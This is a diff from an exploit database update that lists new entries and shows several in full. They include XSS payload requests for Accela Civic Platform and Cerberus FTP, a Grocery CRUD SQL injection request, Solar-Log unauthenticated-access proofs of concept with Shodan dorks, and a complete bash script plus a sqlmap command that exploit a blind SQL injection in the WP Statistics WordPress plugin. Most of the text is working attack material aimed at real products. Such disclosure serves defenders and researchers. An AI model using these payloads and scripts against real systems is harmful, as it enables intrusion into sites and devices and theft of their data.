DB: 2021-06-12

12 changes to exploits/shellcodes

WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)
Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)
Cerberus FTP Web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)
Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF)
OpenEMR 5.0.0 - Remote Code Execution (Authenticated)
WordPress Plugin Database Backups 1.2.2.6 - 'Database Backup Download' CSRF
Grocery crud 1.6.4 - 'order_by' SQL Injection
Solar-Log 500 2.8.2 - Incorrect Access Control
Solar-Log 500 2.8.2 - Unprotected Storage of Credentials
Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated)
WoWonder Social Network Platform 3.1 - Authentication Bypass

exploits/cgi/webapps/49869.py

@@ -5,6 +5,7 @@
 # Software Link: https://downloads.ipfire.org/releases/ipfire-2.x/2.25-core156/ipfire-2.25.x86_64-full-core156.iso
 # Version: 2.25 - core update 156
 # Tested on: parrot os 5.7.0-2parrot2-amd64
+# CVE: CVE-2021-33393
 
 #!/usr/bin/python3
 

exploits/multiple/webapps/49980.txt

@@ -0,0 +1,80 @@
+# Exploit Title: Accela Civic Platform 21.1 - 'servProvCode' Cross-Site-Scripting (XSS)
+# Exploit Author: Abdulazeez Alaseeri
+# Software Link: https://www.accela.com/civic-platform/
+# Version: <= 21.1
+# Tested on: JBoss server/windows
+# Type: Web App
+# Date: 06/07/2021
+# CVE: CVE-2021-33904
+
+
+================================================================
+Accela Civic Platform Cross-Site-Scripting <= 21.1
+================================================================
+
+
+================================================================
+Request Heeaders start
+================================================================
+
+GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9 HTTP/1.1
+
+Host: Hidden for security reasons
+
+Cookie: JSESSIONID=FBjC0Zfg-H87ecWmTMDEcNo8HID1gB6rwBt5QC4Y.civpnode; LASTEST_REQUEST_TIME=1623004368673; g_current_language_ext=en_US; hostSignOn=true; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LATEST_SESSION_ID=lVkV3izKpk9ig1g_nqSktJ3YKjSbfwwdPj0YBFDO; LATEST_WEB_SERVER=1.1.1.1; LATEST_LB=1360578058.47873.0000
+
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+
+Accept-Language: en-US,en;q=0.5
+
+Accept-Encoding: gzip, deflate
+
+Upgrade-Insecure-Requests: 1
+
+Te: trailers
+
+Connection: close
+
+================================================================
+Request Heeaders end
+================================================================
+
+
+
+================================================================
+Response Heeaders start
+================================================================
+HTTP/1.1 200 OK
+
+Expires: Wed, 31 Dec 1969 23:59:59 GMT
+
+Cache-Control: no-cache
+
+X-Powered-By: JSP/2.3
+
+Set-Cookie: LASTEST_REQUEST_TIME=1623004478373; path=/; domain=.Hidden for security reasons; secure
+
+Set-Cookie: g_current_language_ext=en_US; path=/; domain=.Hidden for security reasons; secure
+
+Set-Cookie: hostSignOn=true; path=/; domain=.Hidden for security reasons; secure
+
+X-XSS-Protection: 0
+
+Pragma: No-cache
+
+Date: Sun, 06 Jun 2021 18:34:38 GMT
+
+Connection: close
+
+Content-Type: text/html;charset=UTF-8
+
+Content-Length: 13222
+================================================================
+Response Heeaders end
+================================================================
+
+
+You can notice that the parameter "servProvCode" is vulnerable to XSS.
+Payload: k3woq%22%5econfirm(1)%5e%22a2pbrnzx5a9

exploits/multiple/webapps/49981.txt

@@ -0,0 +1,62 @@
+# Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)
+# Date: 08/06/2021
+# Exploit Author: Mohammad Hossein Kaviyany
+# Vendor Homepage: www.cerberusftp.com
+# Software Link: https://www.cerberusftp.com/download/
+# Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier
+# Tested on: windows server 2016
+------------
+About Cerberus FTP Server (From Vendor Site) :     
+
+Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS, 
+FIPS 140-2 validated, and Active Directory and LDAP authentication.
+--------------------------------------------------------
+Exploit Detailes :
+
+This stored XSS bug happens when a user uploads an svg file with the following content :
+<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
+
+Exploit POC :
+
+# Vulnerable Path : /file/upload
+# Parameter: files (POST)
+# Vector: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
+
+#Payload:  
+
+POST /file/upload HTTP/1.1
+Host: target.com
+Connection: close
+Content-Length: 484
+sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAM6ZtOAsyklo6JG
+Origin: https://target.com
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://target.com/file/d/home/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: cftpSID=U02_5UCTumW3vFtt5PrlWwoD4k9ccxW0A87oCM8-jsM
+
+------WebKitFormBoundaryAAM6ZtOAsyklo6JG
+Content-Disposition: form-data; name="cd"
+
+/home
+------WebKitFormBoundaryAAM6ZtOAsyklo6JG
+Content-Disposition: form-data; name="csrftoken"
+
+z-Zlffq0sPaJErxOsMgL4ITcW1x3AuZo3XlZRP5GcKg
+------WebKitFormBoundaryAAM6ZtOAsyklo6JG
+Content-Disposition: form-data; name="files[]"; filename="file.svg"
+Content-Type: image/svg+xml
+
+<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/>
+
+------WebKitFormBoundaryAAM6ZtOAsyklo6JG--
+
+--------------------------

exploits/multiple/webapps/49985.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Grocery crud 1.6.4 - 'order_by' SQL Injection
+# Date: 11/06/1963
+# Exploit Author: TonyShavez
+# Vendor Homepage: https://www.grocerycrud.com/
+# Software Link: https://www.grocerycrud.com/downloads
+# Version: < v2.0.1
+# Tested on: [Linux Ubuntu]
+
+Proof Of concept : 
+=======================
+#Request:
+
+POST /path/to/ajax_list HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 68
+DNT: 1
+Connection: close
+
+page=1&per_page=100&order_b=&order_by[]={INJECT HERE}&search_field=&search_text=
+=======================
+#vulnerable parameter :
+
+order_by 
+=======================
+#type : [error-based]

exploits/multiple/webapps/49986.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Solar-Log 500 2.8.2 - Incorrect Access Control
+# Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP""
+# Date: 2021-06-11
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.solar-log.com/en/
+# Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/
+# Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013
+# Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/
+
+# 1. Description:
+# The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication,
+# which allows arbitrary remote attackers to gain administrative privileges by connecting to the server.
+# As a result, the attacker can modify configuration files and change the system status.
+
+# 2. Proof of Concept:
+# Access the /lan.html of Solar-Log 500 without ANY authentication,
+# and you can get gain administrative privileges to modify configuration files and change the system status.
+# http://<Your Modem IP>/lan.html

exploits/multiple/webapps/49987.txt

@@ -0,0 +1,20 @@
+# Exploit Title: Solar-Log 500 2.8.2 - Unprotected Storage of Credentials
+# Google Dork: In Shodan search engine, the filter is ""Server: IPC@CHIP""
+# Date: 2021-06-11
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.solar-log.com/en/
+# Software Link: Firmware for Solar-Log https://www.solar-log.com/en/support/firmware/
+# Version: Solar-Log 500 all versions prior to 2.8.2 Build 52 - 23.04.2013
+# Tested on: It is a proprietary devices: https://www.solar-log.com/en/support/firmware/
+
+# 1. Description:
+# An issue was discovered in Solar-Log 500 prior to 2.8.2 Build 52 - 23.04.2013.
+# In /export.html, email.html, sms.html, the devices store plaintext passwords,
+# which may allow sensitive information to be read by someone with access to the device.
+
+# 2. Proof of Concept:
+# Browse the configuration page in Solar-Log 500,
+# we can find out that the passwords of FTP, SMTP, SMS services are stored in plaintext.
+# http://<Your Modem IP>/export.html
+# http://<Your Modem IP>/email.html
+# http://<Your Modem IP>/sms.html

exploits/php/webapps/49894.sh

@@ -0,0 +1,130 @@
+# Exploit Title: WordPress Plugin WP Statistics 13.0.7 - Time-Based Blind SQL Injection (Unauthenticated)
+# Date: 20/05/2021
+# Exploit Author: Mansoor R (@time4ster)
+# CVSS Score: 7.5 (High)
+# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+# Version Affected: 13.0 to 13.0.7
+# Vendor URL: https://wordpress.org/plugins/wp-statistics/
+# Patch: Upgrade to wp-statistics 13.0.8 (or above)
+# Tested On: wp-statistics 13.0.6,13.0.7
+
+#!/bin/bash
+
+# Credits: 
+# https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/
+
+# SQLmap Exploit for grepping database banner (automated):
+# sqlmap -u "http://192.168.1.54/wordpress/wp-admin/admin.php?ID=1&page=wps_pages_page&type=1" --techniqu=T --dbms="mysql" -p "ID" -b
+
+# WARNINGS: 
+# Only test the exploit on websites you are authorized to.
+# The exploit will perform sleep for 3 seconds. Don't use on production server of organization without prior permissions.
+
+
+# Exploit
+# ==============
+
+echo
+echo "============================================================================================"
+echo "Unauthenticated Time-Based Blind SQL Injection in WP Statistics < 13.0.8"
+echo
+echo "By: Mansoor R (@time4ster)"
+echo "============================================================================================"
+echo
+
+
+
+function printHelp()
+{
+	echo -e "
+Usage:
+
+-u|--wp-url      <string>		Wordpress target url
+-k|--check				Only checks whether vulnerable version of plugin is running or not.
+-h|--help				Print Help menu
+
+
+Example:
+./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress 
+./wp-statistics-exploit.sh --wp_url https://www.example.com/wordpress --check
+"
+}
+
+#Processing arguments
+check="false"
+exploit="true"
+while [[ "$#" -gt 0 ]]
+do
+key="$1"
+
+case "$key" in
+    -u|--wp-url)
+	    wp_url="$2"
+	    shift
+	    shift # past argument
+	    ;;
+    -k|--check)
+	    check="true"
+	    exploit="false"
+	    shift
+	    shift
+	    ;;
+    -h|--help)
+	    printHelp
+	    exit
+	    shift
+	    ;;
+    *)   
+	    echo [-] Enter valid options
+	    exit
+	    ;;
+esac
+done
+
+[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL. Use -h for help menu." && exit
+
+function checkVersion()
+{
+	url="$1"
+	[[ -z "$url" ]] && return
+	target_endpoint="$url/wp-content/plugins/wp-statistics/readme.txt"
+	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
+
+	version=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i -m 1 "stable tag:" | grep -o -E "[0-9]+\.[0-9]+\.[0-9]+")
+	[[ -n "$version" ]] && echo "[+] WP-statistical Plugin Version: $version" 
+	[[ -z "$version" ]] && echo "[-] WP-statistical Unable to detect version." && return
+
+	vuln_version=(13.0.7 13.0.6 13.0.5 13.0.4 13.0.3 13.0.1 13.0)
+	is_vulnerable="false"
+	for v in "${vuln_version[@]}";do 
+		[[ "$version" == "$v" ]] && is_vulnerable="true" && break	
+	done
+	[[ "$is_vulnerable" == "true" ]] && echo "[++] Target $url is Vulnerable"
+	[[ "$is_vulnerable" == "false" ]] && echo "[--] Target $url is  Not Vulnerable"
+}
+
+function exploitPlugin()
+{
+	url="$1"
+	target_endpoint="$url/wp-admin/admin.php"
+	user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
+	sleep=3
+	payload="ID=1 AND (SELECT * from (select SLEEP($sleep))a)"
+
+	echo -e -n "[!] Caution: You are going to execute sleep database command for $sleep seconds. Proceed only if you have permission.\nPress (Y/y) to continue or any other key to exit: "
+	read choice
+	[[ "$choice" != "y" ]] && [[ "$choice" != "Y" ]] && return
+
+	echo
+	echo "[+] Trying Payload:"	
+	set -x
+	curl -v -ks -G --user-agent "$user_agent" "$target_endpoint" \
+		--data-urlencode "page=wps_pages_page" \
+		--data-urlencode "type=1" \
+		--data-urlencode "$payload"
+
+
+}
+
+[[ "$check" == "true" ]] && checkVersion "$wp_url"
+[[ "$exploit" == "true" ]] && exploitPlugin "$wp_url"